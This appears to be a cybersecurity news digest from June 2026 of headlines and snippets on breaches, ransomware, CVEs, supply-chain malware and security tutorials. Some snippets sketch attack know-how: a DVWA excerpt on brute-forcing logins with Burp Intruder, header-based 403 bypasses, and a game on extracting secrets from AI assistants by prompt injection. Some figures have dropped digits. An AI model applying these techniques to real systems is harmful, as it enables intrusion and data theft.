Irish hospital fined €300,000 over cyber attack on patient data. (June 15, 2026, 1:43 PM GMT) -- MLex Summary: Midlands Regional Hospital Tullamore ...
https://www.mlex.com/mlex/articles/2489594/irish-hospital-fined-300-000-over-cyber-attack-on-patient-data

Attackers Hijack Popular WordPress Plugins to Deploy Backdoors - Infosecurity Magazine
Related: Adriatic Port Cyber-Attack by Anubis Sparks Warning Over Maritime Security Risks (News, 15 June 2026).
https://www.infosecurity-magazine.com/news/wordpress-plugin-supply-chain/

Adriatic Port Cyber-Attack Sparks Warning Over Maritime Security - Infosecurity Magazine
New analysis, published on June 11 by threat intelligence firm Resecurity, examined a cyber-attack which saw Anubis list the Adriatic Port Authority ...
https://www.infosecurity-magazine.com/news/anubis-ransomware-adriatic-port/

FBI created a 'ghost town'. Here's what they are using it for - ThePrint
Category: Features. Tags: cyber attack, FBI, US government.
https://theprint.in/feature/fbi-fake-ghost-town/2960444/?amp

Supreme Court to decide if migrants detained for months must receive bond hearings | News
Related from ABC12: Cancer patient says McLaren cyber attack has delayed his treatments; Democratic governor says Biden 'fit for office' after meeting.
https://www.abc12.com/news/supreme-court-to-decide-if-migrants-detained-for-months-must-receive-bond-hearings/article_15d11348-ee78-57f5-a1c5-f4a26326ca4c.html

EUROSATORY, LEONARDO PRESENTS THE CYBER DEFENCE SUITE
While digitalisation and high interoperability enhance operational effectiveness, they also inevitably expand the cyber attack surface, even in ...
https://www.leonardo.com/en/press-release-detail/-/detail/15-06-2026-eurosatory-leonardo-presents-the-cyber-defence-suite

Automation, cyber and 'green' products redraw manufacturing risk map for insurers
... cyber attack surface and increasing the risk that an incident shuts down physical production, not just office systems. That makes cyber insurance ...
https://www.insurancebusinessmag.com/ca/news/commercial-liability/automation-cyber-and-green-products-redraw-manufacturing-risk-map-for-insurers-578759.aspx

15th June – Threat Intelligence Report - Check Point Research
Categories: Global Cyber Attack Reports; Security Report; Threat Research. Related: 2024's Cyber Battleground Unveiled: Escalating Ransomware Epidemic, the Evolution of ...
https://research.checkpoint.com/2026/15th-june-threat-intelligence-report/

Yesterday's news (specialist press)

Hackers Hide New Argamal Malware Inside Working Hentai Games
Kaspersky found Argamal malware hidden in hentai game installers, giving hackers remote access through working games shared on adult sites and torrents.
https://hackread.com/hackers-hide-argamal-malware-hentai-games/

FBI disrupts massive AI-powered phishing service using a million URLs
In a coordinated effort, the FBI, working with Google and Black Lotus Labs, has dismantled a massive Chinese phishing-as-a-service operation called Outsider Enterprise with thousands of phishing websites used to steal credit card data and passwords. [...]
https://www.bleepingcomputer.com/news/security/fbi-disrupts-massive-ai-powered-phishing-service-using-a-million-urls/

SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 101
The Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape. Malware Newsletter: IronWorm: Shai-Hulud's rustier cousin; Trojanized ai-sdk-ollama Delivers Miasma, a Self-Replicating npm Worm via binding.gyp; Inside the Cross-Platform Propagation of a New Gafgyt Variant C0XMO; Using AI Agents to Analyze Malware on REMnux; The Miasma […]
https://securityaffairs.com/193609/breaking-news/security-affairs-malware-newsletter-round-101.html

Apple Silicon Is Not a Safe Harbor From Spectre-Class Attacks
MIT's Fractal OS has found the first evidence of Apple M1 Phantom speculation and overturned prior research on the M1's conditional branch predictor, challenging the assumption that Apple Silicon is safer from speculative execution attacks.
https://latesthackingnews.com/2026/06/14/apple-m1-phantom-speculation-fractal-os/

Security Affairs newsletter Round 581 by Pierluigi Paganini – INTERNATIONAL EDITION
A new round of the weekly Security Affairs newsletter has arrived! Every week, the best security articles from Security Affairs are free in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. Washington Pulled the Plug on Anthropic's Fable 5 and Mythos 5 models. The Rest of […]
https://securityaffairs.com/193600/security/security-affairs-newsletter-round-581-by-pierluigi-paganini-international-edition.html

Ukrainian Extradited from Ireland Pleads Guilty Over Role in Conti Ransomware Scheme
Ukrainian national Oleksii Lytvynenko pleaded guilty in the U.S. for his role in Conti ransomware attacks targeting victims worldwide. Oleksii Oleksiyovych Lytvynenko (44), a Ukrainian national extradited from Ireland to the U.S., has pleaded guilty to conspiracy to commit wire fraud for his involvement in the Conti ransomware operation. Prosecutors said he helped conduct attacks […]
https://securityaffairs.com/193590/uncategorized/ukrainian-extradited-from-ireland-pleads-guilty-over-role-in-conti-ransomware-scheme.html

News from two days ago (specialist press)

Automated Penetration Testing with Claude AI
Overview: This article demonstrates a complete, end-to-end penetration test driven almost entirely through natural language. By connecting Claude Desktop to a Model Context Protocol (MCP) [...]
https://www.hackingarticles.in/automating-penetration-testing-with-claude-ai/

Ex-school district employee jailed for hacks on former employer
A former IT employee at an Iowa school district was sentenced to 21 months in prison after conducting a prolonged cyberattack against the former employer that disrupted classroom operations, deleted accounts, and caused tens of thousands of dollars in damages. [...]
https://www.bleepingcomputer.com/news/security/ex-school-district-employee-jailed-for-hacks-on-former-employer/

Washington Pulled the Plug on Anthropic's Fable 5 and Mythos 5 models. The Rest of the World Is Watching.
Anthropic disputes restrictions on Mythos 5 and Fable 5, arguing the decision lacks transparency and isn't based on clear technical evidence. On Friday June 12 at 5:21pm ET, Anthropic received a letter from the US Commerce Department, signed by Commerce Secretary Howard Lutnick and drafted with officials from the Bureau of Industry and Security. The […]
https://securityaffairs.com/193579/ai/washington-pulled-the-plug-on-anthropic-fable-5-and-mythos-5-models.html

Extradited Ukrainian Man Admits Role in Conti Ransomware Attacks
Ukrainian national Oleksii Lytvynenko has pleaded guilty in the US to wire fraud conspiracy linked to Conti ransomware, which hit more than 1,000 victims and generated at least 0 million in ransom payments.
https://hackread.com/extradited-ukrainian-admits-conti-ransomware-attacks/

Chinese hackers hijack auth flow, spy on isolated network for a decade
Chinese hackers took control of a target organization's authentication stack and maintained persistence for 10 years, with full visibility into the administrative activity. [...]
https://www.bleepingcomputer.com/news/security/chinese-hackers-hijack-auth-flow-spy-on-isolated-network-for-a-decade/

Critical Splunk Enterprise Flaw Lets Attackers Run Code Without Authentication
Splunk has released security updates to address a critical security flaw in Splunk Enterprise that could be exploited to conduct unauthenticated file operations and even remote code execution. The vulnerability, tracked as CVE-2026-20253, is rated 9.8 on the CVSS scoring system. "In Splunk Enterprise versions below 10.2.4 and 10.0.7, an unauthenticated user could create or truncate arbitrary
https://thehackernews.com/2026/06/critical-splunk-enterprise-flaw-lets.html

U.S. CISA adds Oracle PeopleSoft Enterprise PeopleTools flaw to its Known Exploited Vulnerabilities catalog
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Oracle PeopleSoft Enterprise PeopleTools flaw to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Oracle PeopleSoft Enterprise PeopleTools flaw, tracked as CVE-2026-35273 (CVSS score of 9.8), to its Known Exploited Vulnerabilities (KEV) catalog. Oracle PeopleSoft Enterprise PeopleTools is the underlying technology platform […]
https://securityaffairs.com/193574/security/u-s-cisa-adds-oracle-peoplesoft-enterprise-peopletools-flaw-to-its-known-exploited-vulnerabilities-catalog.html

Atomic Arch: 400+ AUR Packages Backdoored with eBPF Rootkit and Credential Stealer
An AUR supply chain attack compromised more than 400 Arch Linux packages from 11 June 2026, planting a Rust credential stealer and an eBPF rootkit that hides from standard inspection tools.
https://latesthackingnews.com/2026/06/13/aur-supply-chain-attack-arch-packages-backdoored/

U.S. Orders Anthropic to Suspend Fable 5 and Mythos 5 Access for Foreign Nationals
Anthropic said on Friday it will "abruptly disable" its most advanced artificial intelligence (AI) models, Claude Fable 5 and Mythos 5, for all users after the U.S. government ordered it to suspend access to the models for foreign nationals, whether inside or outside the U.S., citing national security concerns. The AI company said it received an order at 5:21 p.m. ET, instructing it to suspend
https://thehackernews.com/2026/06/us-orders-anthropic-to-suspend-fable-5.html

Weekly Metasploit Update: New Kerberos/Certificate tracing options, and multiple new modules
New Tracing Options. As hard as we try to ensure that Metasploit is bug free, issues inevitably come up. Whether you're running a module on an op or writing a new one, what we can do is make the debugging experience easier. To that end, one of our two Google Summer of Code (GSoC) projects is here to deliver. Building on the previous pattern of HttpTrace come two new options, KerberosTicketTrace and CertificateTrace. These options, when enabled, turn on debugging output of the Kerberos tickets and certificates that are both sent and received by applicable modules. Now when things aren't going quite right, users have new levers to reach for to inspect what's happening under the hood. For example, to inspect exactly what's happening when using the auxiliary/admin/kerberos/get_ticket module: msf...
https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-13-06-2026

News from the preceding days

Tracing Digital Intent: New MacOS Tahoe 26 Artifact Discovered
Unit 42 has discovered a new macOS Tahoe 26 forensic artifact that tracks user menu selections across the operating system. Learn more here.
https://unit42.paloaltonetworks.com/new-macos-artifact-discovered/

Iran-Linked Handala Breached a California Water Utility. It Could Have Done Worse, and It Knows That.
Pro-Iran group Handala breached Cal Water via an exposed GPS tool, reaching billing data for 2M customers. 5GB leaked. On June 11, 2026, the Iran-linked threat group Handala posted a claim on its blog that it had compromised California Water Service, known as Cal Water, and published a 5GB proof-of-concept data dump to back it […]
https://securityaffairs.com/193565/uncategorized/iran-linked-handala-breached-a-california-water-utility-it-could-have-done-worse-and-it-knows-that.html

ShinyHunters Uses Oracle Zero-Day to Rampage Higher Ed
A major bug in Oracle's ERP software disproportionately affected American universities, and hackers have capitalized by stealing gobs of data.
https://www.darkreading.com/vulnerabilities-threats/shinyhunters-oracle-zero-day-higher-ed

Over 400 Arch Linux AUR Packages Hijacked to Deploy Infostealer and eBPF Rootkit
Attackers took over more than 400 packages in the Arch User Repository (AUR) this week and rewrote their build scripts to install a credential stealer on any machine that built them. The malware is a Rust binary built to harvest developer secrets. When it lands with root, it can also load an eBPF rootkit to hide itself. The AUR is Arch Linux's community package collection, and it is separate
https://thehackernews.com/2026/06/over-400-arch-linux-aur-packages.html

Google Sues Chinese Smishing Network Accused of Using Gemini AI in Phishing
Google on Friday said it's pursuing legal action against a Chinese cybercrime network, accusing it of using its Gemini artificial intelligence (AI) agent to send phishing text messages targeting Americans. The network is said to be behind the development and management of a phishing-as-a-service (PhaaS) software kit called Outsider, per the tech giant. "The operation weaponized Gemini to help
https://thehackernews.com/2026/06/google-sues-chinese-smishing-network.html

Atomic Arch Campaign Hijacks 20+ Linux AUR Packages to Deliver Malware
Over 20 Linux packages were compromised in the Atomic Arch campaign, which abuses AUR ownership transfers to drop rootkit-like malware.
https://hackread.com/atomic-arch-hijacks-linux-aur-packages-malware/

ShinyHunters Target Universities in Oracle PeopleSoft Zero-Day Attack
Google says ShinyHunters exploited Oracle PeopleSoft zero-day to steal data from 100+ organisations, with universities making up most victims.
https://hackread.com/shinyhunters-universities-oracle-peoplesoft-zero-day-attack/

Stolen iPhones could soon be worth a lot less to thieves
Apple and the Met Police are working together to make stolen iPhones harder to reset, resell, and profit from.
https://www.malwarebytes.com/blog/mobile/2026/06/stolen-iphones-could-soon-be-worth-a-lot-less-to-thieves

Active Exploitation of Oracle PeopleSoft Zero-Day (CVE-2026-35273)
Overview. On June 10, 2026, Oracle published a security alert for CVE-2026-35273, a critical vulnerability in the Updates Environment Management component of PeopleSoft Enterprise PeopleTools. Oracle released an out-of-band patch the same day as the advisory, underscoring the urgency of remediation. The vulnerability has a CVSSv3.1 score of 9.8 and is remotely exploitable without authentication. Per the vendor advisory, successful exploitation may result in remote code execution (RCE). TrendAI has classified the underlying flaw as a server-side request forgery (CWE-918). PeopleTools versions 8.61 and 8.62 are affected. CVE-2026-35273 was reported to Oracle through TrendAI's Zero Day Initiative. According to a report published by Mandiant on June 11, 2026, this vulnerability has been exploited...
https://www.rapid7.com/blog/post/etr-active-exploitation-of-oracle-peoplesoft-zero-day-cve-2026-35273

The SpaceX Pre-IPO Market: How Crypto Rails Are Opening Synthetic Access
SpaceX Pre-IPO demand is growing as crypto exchanges offer synthetic exposure to its reported .75T valuation without direct equity ownership.
https://hackread.com/spacex-pre-ipo-market-crypto-synthetic-access/

Claude Fable 5 Doesn't Change the Mythos Security Story
Stay cool: Mythos 5 is an upgrade over Mythos Preview while Fable 5 is Mythos "made safe for general use," Anthropic explains.
https://www.darkreading.com/vulnerabilities-threats/claude-fable-5-doesnt-change-mythos-security-story

Code Girls: The Secret Heroes Of World War II
This week in cybersecurity from the editors at Cybercrime Magazine. Sausalito, Calif. – Jun. 12, 2026 – Watch the YouTube Short. During World War II, some of America's most powerful weapons weren't bombs or guns. They were women sitting in secret rooms breaking enemy codes, [...]
https://cybersecurityventures.com/code-girls-the-secret-heroes-of-world-war-ii/

Penelope – A Modern Alternative to Netcat for Red Teamers
Overview: This article presents an end-to-end engagement built entirely around Penelope, an automated shell handler and post-exploitation framework. We catch an initial reverse shell on [...]
https://www.hackingarticles.in/penelope-a-modern-alternative-to-netcat-for-red-teamers/

Feds Seize AudiA6 and Dark2Web in 9M Crypto Laundering Case
Feds seized AudiA6 and Dark2Web in a major crypto laundering case, arresting two suspects linked to over 9M in alleged illicit transactions.
https://hackread.com/feds-seize-audia6-dark2web-crypto-laundering-case/

Fake verification pages are stealing Steam accounts from players
A convincing fake FACEIT verification page is stealing Steam accounts by using a fake login window that looks completely legitimate.
https://www.malwarebytes.com/blog/threat-intel/2026/06/fake-verification-pages-are-stealing-steam-accounts-from-players

IEEE Victoris 4.0 — CTF 2025 — Quals DFIR Challenges
Hi, I'm glad to share with you my writeup for getting first blood in 2/2 DFIR challenges. First Challenge: "the Frontdoor" (FIRST BLOOD). In this challenge, we have a Linux disk image, and we need to investigate it to get the correct answer. Reading the bash history or ".zsh_history", we can see that there are a lot of file navigation commands, and Git activity in "MyProject", which is located in /home/Documents. Also, while I was digging around all the Linux files, I found an XML file, "recently-used.xml", located in "/home/kali/.local/share/recently-used.xml". This XML tracks that he opened the /home/kali/Documents/MyProject/.git/config file using Mousepad and Thunar (the Kali Linux GUI). So, the config file will be the first file to...
https://infosecwriteups.com/ieee-mansb-ctf-2025-dfir-writeup-3b49a1afe7f6?source=rss----7b722bfd1b8d---4

DVWA Cheat Sheet (Low & Medium)
Damn Vulnerable Web Application. Brute Force: Low & Medium. Just testing with this username & password to get the error message (we will need it). As you can see, we got this error message, so let's hop on Burp Suite and intercept the GET request. This is the GET request. Send it to the Intruder, hit Clear to clear any saved parameter, select the password that you sent (for mine it was 'admin'), select it and hit Add. The word after (password=) must be colored like this. Now let's go to the payloads section in the Intruder and load our txt payload file (I used the top 100 words from the rockyou.txt wordlist for simplicity). Now we set the payload. How can we find out if the password is right or not? So, let's go to settings in the Intruder section to make our customization: add the word "incorrect" to these words. Intruder...
https://infosecwriteups.com/dvwa-cheat-sheet-low-medium-c7490e76f1b5?source=rss----7b722bfd1b8d---4

How I Built a SOAR Automation in Microsoft Sentinel That Responds to Attacks Without a Single Click
A Logic App playbook, an automation rule, a real permissions error — and what it taught me about how automated incident response actually works. An SSH brute force incident fires in Sentinel. High severity. 260 failed attempts in 28 minutes. Without automation, an analyst gets paged, manually opens the incident, investigates, and responds. That process takes 15 to 30 minutes on a good day — longer if it's 3am. With SOAR, the moment that incident is created, a playbook runs automatically. No analyst needed. No manual trigger. The response is documented, timestamped, and logged before anyone even opens their laptop. This is how I built that automation in Microsoft Sentinel from scratch — and what I ran into along the way. What SOAR actually is: SOAR stands for Security Orchestration,...
https://infosecwriteups.com/how-i-built-a-soar-automation-in-microsoft-sentinel-that-responds-to-attacks-without-a-single-click-e41226314564?source=rss----7b722bfd1b8d---4

Six levels, one lesson: LLMs cannot keep a secret
A hands-on breakdown of GitHub's Secure Code Game Season 3 and why your system prompt is not a security layer. I like keeping this "Let's all learn AI Security" part fun. So I found this little game on prompt injection that I think you'll like, and it actually teaches you quite a few things. GitHub's Secure Code Game Season 3 is an open source, browser-based challenge consisting of six levels, each one a vulnerable AI assistant with a hidden secret and a dare to extract it. You craft the attack, you feel it work, and then you fix it. No CTF experience needed. The scenario running through all six levels: a fast-growing e-commerce company needs an AI chatbot for their gift card department. Deadline in three days. You and a junior colleague are building it. Each level is a new iteration...
https://infosecwriteups.com/six-levels-one-lesson-llms-cannot-keep-a-secret-742927383722?source=rss----7b722bfd1b8d---4

Recovering a Forgotten Password in a Self-Hosted n8n Docker Deployment
Learn how to recover complete access to a self-hosted n8n Docker deployment when password reset emails fail.
https://infosecwriteups.com/recovering-a-forgotten-password-in-a-self-hosted-n8n-docker-deployment-251e073757f5?source=rss----7b722bfd1b8d---4

Header Manipulation: Bypasses, Probing, and the Security Audit Nobody Does
Request headers are not metadata. They are inputs, and inputs can be manipulated. Series: curl — The Request Engine You Never Learned Properly. Article: 7 of 16. Request headers are not just metadata. They are inputs. And like any input that reaches server-side logic, they can be manipulated — to bypass access controls, probe for misconfigurations, spoof identity, and test security posture. This article covers the header manipulation techniques that show up constantly on THM/HTB machines and in real web application testing: Host header attacks, IP spoofing headers, 403 bypass patterns, CORS misconfiguration testing, and the security header audit that most beginners skip entirely. Most techniques here are one flag or one -H addition away from a curl command you already know how to write. The...
https://infosecwriteups.com/header-manipulation-bypasses-probing-and-the-security-audit-nobody-does-62e85ad28cb0?source=rss----7b722bfd1b8d---4

Beyond the Patch: Understanding the SonicWall SSL-VPN MFA Bypass Exposure
In May 2026, ransomware-linked attacks associated with CVE-2024-12802 targeting SonicWall Gen6 SSL-VPN devices regained attention. The vulnerability stems from a structural flaw in how SSL-VPN authentication handles UPN (User Principal Name) and SAM (Security Account Manager) account formats separately. In certain environments, attackers can exploit alternative login formats to bypass MFA even when MFA appears to be enabled. What makes this vulnerability particularly dangerous is that it is not simply a patching issue. SonicWall's official advisory states that Gen6 devices require an additional six-step manual LDAP reconfiguration after firmware updates. However, standard patch management workflows typically verify only firmware versions and do not confirm whether the manual reconfiguration...
https://infosecwriteups.com/beyond-the-patch-understanding-the-sonicwall-ssl-vpn-mfa-bypass-exposure-35b0627ceac2?source=rss----7b722bfd1b8d---4

Check Point VPN Authentication Bypass (CVE-2026-50751): Client-Controlled IKEv1 Auth Flipped by Ransomware Affiliate
A CVSS 9.3 flaw in Check Point Remote Access VPN let unauthenticated attackers bypass certificate validation by supplying a crafted IKEv1 VendorID payload — exploited for 32 days before a patch, with one confirmed Qilin ransomware post-compromise chain.
https://latesthackingnews.com/2026/06/12/check-point-vpn-authentication-bypass-cve-2026-50751-client-controlled-ikev1-auth-flipped-by-ransomware-affiliate/

Phishing Attack Volume Down 20%, But Risk Still Rising
Hackers are valuing quality over quantity, using AI to upgrade their phishing attacks rather than multiply them.
https://www.darkreading.com/cybersecurity-analytics/phishing-volume-down-20-risk-rising

Drupal Core CVE-2026-9082 Active Exploitation Confirmed Within Days of Disclosure
Sensor Intel Series: June 2026 CVE Trends
https://www.f5.com/labs/articles/drupal-core-cve-2026-9082-active-exploitation-confirmed-within-days-of-disclosure

USN-8426-1: Linux kernel (Azure) vulnerabilities
It was discovered that the Linux kernel algif_aead module did not properly handle in-place cryptographic operations. This flaw is known as Copy Fail. A local attacker could use this to escalate privileges, or possibly escape a container. (CVE-2026-31431) It was discovered that the Linux kernel did not properly handle shared page fragments during socket buffer operations, collectively known as Dirty Frag. A logic flaw existed in the XFRM ESP-in-TCP subsystem and in the RxRPC networking subsystem when processing paged fragments. A local attacker could use this to escalate privileges, or possibly escape a container. (CVE-2026-43284, CVE-2026-43500) It was discovered that a logic flaw existed in the XFRM ESP-in-TCP subsystem in the Linux kernel when handling socket buffer fragments. This flaw...
https://ubuntu.com/security/notices/USN-8426-1

ShinyHunters Leak 40GB of University of Nottingham Student Data
ShinyHunters hackers leak 40GB of University of Nottingham personal and financial data, allegedly impacting 450,000 students and staff records.
https://hackread.com/shinyhunters-university-of-nottingham-student-data-leak/

USN-8423-1: lwIP vulnerabilities
It was discovered that lwIP contained a buffer overflow in the EAP authentication handling code. An attacker could possibly use this issue to trigger a buffer overflow, resulting in arbitrary code execution or a denial of service. This issue only affected Ubuntu 20.04 LTS. (CVE-2020-8597) It was discovered that lwIP incorrectly handled certain ICMPv6 or 6LoWPAN packets. An attacker could possibly use this issue to trigger a buffer overflow, resulting in information disclosure. This issue only affected Ubuntu 20.04 LTS. (CVE-2020-22283, CVE-2020-22284) It was discovered that lwIP did not properly validate certain SNMPv3 authentication parameters. An attacker could possibly use this issue to trigger a stack-based buffer overflow, resulting in arbitrary code execution or a denial of service....
https://ubuntu.com/security/notices/USN-8423-1

Atomic Arch npm Campaign Adds Malicious Dependency
TL;DR On June 11, 2026, Sonatype researchers uncovered Atomic Arch, a new campaign targeting orphaned packages in the Arch User Repository in which attackers take over legitimate, abandoned AUR projects and modify PKGBUILDs to install a malicious npm package during installation. Analysis of atomic-lockfile, the malicious dependency, found a bundled Linux payload with functionality tied to credential harvesting, stealth, anti-debugging, and potential data exfiltration. On June 12, 2026, a second wave emerged, using Bun-based installation paths in some affected packages rather than npm alone. Researchers have now identified multiple packages associated with the campaign, including atomic-lockfile, js-digest, and lockfile-js. Preliminary analysis suggests the campaign...
https://www.sonatype.com/blog/atomic-arch-npm-campaign-adds-malicious-dependency

Max-Severity Ivanti Flaw Exploited 24 Hours After Disclosure
Initial methods suggest attackers had likely mapped out Ivanti's asset landscape upfront and acted quickly once the exploit became public.
https://www.darkreading.com/vulnerabilities-threats/max-severity-ivanti-sentry-flaw-exploited-24-hours

Google can be liable for false AI Overviews, court rules
"AI can make mistakes" isn't a good enough legal defense for defamatory or incorrect AI Overviews, a German court has ruled.
https://www.malwarebytes.com/blog/ai/2026/06/google-can-be-liable-for-false-ai-overviews-court-rules

Making secret scanning more trustworthy: Reducing false positives at scale
Alerts are more trustworthy and actionable when noise is reduced. See how we improved the verification step with context-aware LLM reasoning.
https://github.blog/security/making-secret-scanning-more-trustworthy-reducing-false-positives-at-scale/

USN-8424-1: Ubuntu Kylin Software Center vulnerability
It was discovered that Ubuntu Kylin Software Center incorrectly handled user-supplied input in its D-Bus service. A local attacker could possibly use this issue to gain administrative privileges.
https://ubuntu.com/security/notices/USN-8424-1

Segmentation Works for OT If Operators Are Paying Attention
Even the best segmentation strategy will fall apart without constant oversight and disciplined operations.
https://www.darkreading.com/cybersecurity-operations/segmentation-works-for-ot-if-operators-are-paying-attention

Parents: How To Help Your College Students Avoid Roommate Scams
This week in cybersecurity from the editors at Cybercrime Magazine. Sausalito, Calif. – Jun. 11, 2026 – Listen to the podcast. Media outlets and cybersecurity industry experts have been warning for the past several years about a persistent scheme that targets college students on Craigslist, ...
https://cybersecurityventures.com/parents-how-to-help-your-college-students-avoid-roommate-scams/

Criminal AI-as-a-Service in 2026: How the Underground Market Is Operationalizing Cybercrime
Introduction. The underground market for criminally oriented generative AI has moved beyond the early hype surrounding 'malicious chatbots.' The gradual integration of AI as a productivity layer within cybercrime operations has become the dominant story, indicating that while fully autonomous AI hacking systems are possible, attackers are not embracing them as expected. Instead, threat actors are increasingly using AI to accelerate routine, but operationally significant, tasks to scale their operations. Drafting phishing lures, profiling targets, debugging code, generating forged documents, modifying malware, translating victim communications, and processing stolen data at scale were once time-consuming activities that AI has made significantly easier. AI does not replace cybercriminals;...
https://www.rapid7.com/blog/post/tr-criminal-ai-underground-market-operationalizing-cybercrime-2026

USN-8422-1: Mistral vulnerability
Eduardo Gonzalez Gutierrez and Arnaud Morin discovered that Mistral did not properly enforce access policies on some API endpoints. An attacker could possibly execute arbitrary code on a Mistral worker and possibly extract sensitive data including service credentials from it.
https://ubuntu.com/security/notices/USN-8422-1

USN-8421-1: Ironic vulnerabilities
Dmitry Tantsur and Tuomo Tanskanen discovered that Ironic did not properly validate file paths when handling ISO images. A privileged authenticated remote user could use this issue to perform path traversal via a crafted ISO image and overwrite arbitrary files on the Ironic conductor. (CVE-2026-48681) Dmitry Tantsur and Tuomo Tanskanen discovered that Ironic did not properly validate kernel command line parameters. A privileged authenticated remote user could use this issue to inject scripts during node boot and possibly execute arbitrary code. (CVE-2026-46447) Dmitry Tantsur and Tuomo Tanskanen discovered that Ironic incorrectly restricted access to custom PXE templates. A privileged authenticated remote user could use this issue to read arbitrary sensitive files on the Ironic conductor....
https://ubuntu.com/security/notices/USN-8421-1

VRChat says reported data breach never happened
We explain what data was exposed, the potential risks, and the steps you should take now.
https://www.malwarebytes.com/blog/data-breaches/2026/06/data-of-2-4-million-vrchat-users-stolen

Children’s phones must block nude images by September, UK says
Apple and Google have three months to block nude images on children's phones. They're not allowed to collect any data while they do it.
https://www.malwarebytes.com/blog/family-and-parenting/2026/06/childrens-phones-must-block-nude-images-by-september-uk-says

May 2026 Cyber Attacks Statistics
During May 2026 I collected 165 events: Cyber Crime accounted for 73.8% of events, Malware remained the dominant weapon (48.8%) and Information & Communication was hit the most (37.6%)
https://www.hackmageddon.com/2026/06/11/may-2026-cyber-attacks-statistics/

Trust No Skill: Integrity Verification for AI Agent Supply Chains
Protect enterprise AI agents from supply chain risks by auditing third-party skills for hidden vulnerabilities and multi-stage attack chains.
https://unit42.paloaltonetworks.com/ai-agent-supply-chain-risks/

OceanLotus: From external espionage to domestic targeting
A shift in operational pattern of the infamous Vietnam-aligned APT group
https://www.welivesecurity.com/en/eset-research/oceanlotus-external-espionage-domestic-targeting/

Palo Alto Networks PAN-OS GlobalProtect Authentication Bypass
What is the Vulnerability? CVE-2026-0257 is a high-severity authentication bypass vulnerability affecting the GlobalProtect portal and gateway components of Palo Alto Networks PAN-OS and certain Prisma Access deployments. Successful exploitation allows an unauthenticated remote attacker to bypass security controls and establish unauthorized VPN connections without valid credentials. Palo Alto Networks, Unit 42, Rapid7, and other security researchers have confirmed active exploitation in the wild, prompting inclusion in CISA's Known Exploited Vulnerabilities (KEV) catalog. The vulnerability impacts deployments that use GlobalProtect authentication override cookies in combination with specific certificate configurations. Threat...
https://fortiguard.fortinet.com/threat-signal-report/6461

Check Point VPN Authentication Bypass Vulnerability
What is the Vulnerability? A critical authentication bypass vulnerability, CVE-2026-50751 (CVSS 9.3), is being actively exploited against vulnerable Check Point Remote Access VPN and Mobile Access deployments configured to use the deprecated IKEv1 key exchange protocol. The flaw allows unauthenticated attackers to bypass user authentication through a certificate validation logic weakness and establish a VPN session without valid credentials. Check Point has confirmed in-the-wild exploitation and released emergency hot fixes for affected products. Check Point's investigation identified exploitation activity affecting multiple organizations globally. Public reporting indicates that affiliates of the ransomware operation Qilin...
https://fortiguard.fortinet.com/threat-signal-report/6460

Chinese, N. Korean Threat Groups Build on Asia-Pacific Success
North Korea's gross domestic product (GDP) has grown, in part because of the nation's state-sponsored cybercrime groups, which target financial firms and other businesses.
https://www.darkreading.com/cyberattacks-data-breaches/chinese-korean-threat-groups-asia-pacific-success

University of Nottingham - 454,635 breached accounts
In June 2026, the University of Nottingham was the target of a cyber attack, later linked to a ShinyHunters "pay or leak" extortion campaign. Tens of gigabytes of data were subsequently published online and included 455k unique email addresses along with extensive personal information including names, addresses, phone numbers, ethnicities, disabilities, passport numbers and information relating to academic enrolments and fee payments. In a post about the incident, the university advised that the breach affected both "current students, and alumni".
https://haveibeenpwned.com/Breach/UniversityOfNottingham

CISA Rewrites Federal Patching Requirements for AI Threat Era
The new directive gives federal agencies three days to fix the most dangerous flaws, while less severe issues can be deferred.
https://www.darkreading.com/cyber-risk/cisa-rewrites-federal-patching-requirements-ai-threat-era

Bug Bounty Research Triggers ServiceNow Security Alert
Security research inadvertently led organizations to believe they were being breached through their ServiceNow instances.
https://www.darkreading.com/vulnerabilities-threats/bug-bounty-research-triggers-servicenow-security-alert

AI Risk Worries Insurers & Businesses Alike
As companies adopt AI, many insurance firms are explicitly excluding AI risks, while others are forging ahead to create the right framework. What risks can firms reasonably manage?
https://www.darkreading.com/cyber-risk/ai-risk-worries-insurers-businesses-alike

Free Spotify Premium hacks on social media are spreading infostealers
Cybercriminals are turning TikTok and Instagram Reels into malware delivery platforms, using free software tutorials to spread infostealers.
https://www.malwarebytes.com/blog/news/2026/06/free-spotify-premium-hacks-on-social-media-are-spreading-infostealers

Automated Threat Hunting: Turning Threat Intelligence into Executable Hunt Plans
Blake McDermott is Senior Threat Hunter at Rapid7. Every week, threat hunt teams are faced with a steady flow of blogs, advisories, and DFIR reports containing valuable intelligence about adversary behaviors, tactics, techniques, and procedures. The challenge is turning that intelligence into repeatable, behavior-based hunting logic quickly enough to be useful. Indicators of compromise still have value, but they age quickly. Behavioral detections give defenders a better way to look for how attackers operate, rather than relying only on what they leave behind. To help solve this, Rapid7's Internal Security team built an automated threat hunting pipeline that transforms threat intelligence reporting into structured, executable hunt plans. The pipeline uses large language models to extract adversary...
https://www.rapid7.com/blog/post/ai-automated-threat-hunting-turns-threat-intelligence-into-executable-hunt-plans

Turn specs into evals for any agent with ASSERT
Adaptive Spec-driven Scoring for Evaluation and Regression Testing (ASSERT) is an open-source framework for converting natural language behavior requirements into executable evaluations of AI models and agents.
https://commandline.microsoft.com/assert-written-intent-executable-evals/

Ransom & Dark Web Issues Week 2, June 2026
ASEC Blog publishes Ransom & Dark Web Issues Week 2, June 2026: Black X Ransomware Attacks on Korean and U.S. Organizations; Data from South Korean Education Platform Leaked on BreachForums by Hasan; Breach of French Secure Government Messaging Data Discovered on PwnForums.
https://asec.ahnlab.com/en/94088/

Fable 5 Is Here. The AppSec Problem Hasn't Changed.
 
https://www.legitsecurity.com/blog/fable-5-is-here-the-appsec-problem-hasnt-changed

Who Runs the Ransomware Group ‘The Gentlemen?’
A cybercrime group known as The Gentlemen has emerged as the second most active ransomware gang by victim count, rapidly attracting a talented pool of hackers through an aggressive recruitment strategy that promises affiliates 90 percent of any ransom paid by victims. This post examines clues pointing to a real life identity for the administrator of The Gentlemen ransomware group.
https://krebsonsecurity.com/2026/06/who-runs-the-ransomware-group-the-gentlemen/

New Book: Cybersecurity for Accounting and Business
